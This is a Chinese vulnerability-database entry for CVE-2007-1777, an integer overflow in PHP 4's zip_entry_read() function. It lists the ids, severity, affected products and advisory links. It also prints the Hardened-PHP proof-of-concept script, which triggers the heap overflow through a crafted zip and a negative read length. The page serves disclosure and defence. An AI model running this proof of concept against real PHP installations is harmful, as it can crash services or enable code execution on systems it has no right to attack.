PHP Zip_Entry_Read() 整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112591 漏洞类型 边界条件错误
发布时间 2007-03-27 更新时间 2008-07-26
CVE编号 CVE-2007-1777 CNNVD-ID CNNVD-200703-683
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29788
https://www.securityfocus.com/bid/23169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-683
|漏洞详情
PHP4.4.5之前的4版本的zip_read_entry函数中存在整数溢出漏洞。远程攻击者可以借助一个包含有入口的ZIP存档,执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/23169/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a heap-based buffer overflow.

Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects versions prior to PHP 4.4.5.

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 4 zip_entry_read() Integer Overflow Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  $r = zip_open("x.zip");
  $e = zip_read($r);
  $x = zip_entry_open($r, $e);


  for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
  unset($arr[600]);
  
  zip_entry_read($e, -1);
  
  unset($arr[601]);
?>
|受影响的产品
Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Server 11 x64 Turbolinux Turbolinux Server 11 Turbolinux Turbolinux Server 10.0.0 x64 TurboLinux Personal TurboLi
|参考资料

来源:BID
名称:23169
链接:http://www.securityfocus.com/bid/23169
来源:MISC
链接:http://www.php-security.org/MOPB/MOPB-35-2007.html
来源:MANDRIVA
名称:MDVSA-2008:130
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2008:130
来源:DEBIAN
名称:DSA-1283
链接:http://www.debian.org/security/2007/dsa-1283
来源:DEBIAN
名称:DSA-1282
链接:http://www.debian.org/security/2007/dsa-1282
来源:SECUNIA
名称:25062
链接:http://secunia.com/advisories/25062
来源:SECUNIA
名称:25025
链接:http://secunia.com/advisories/25025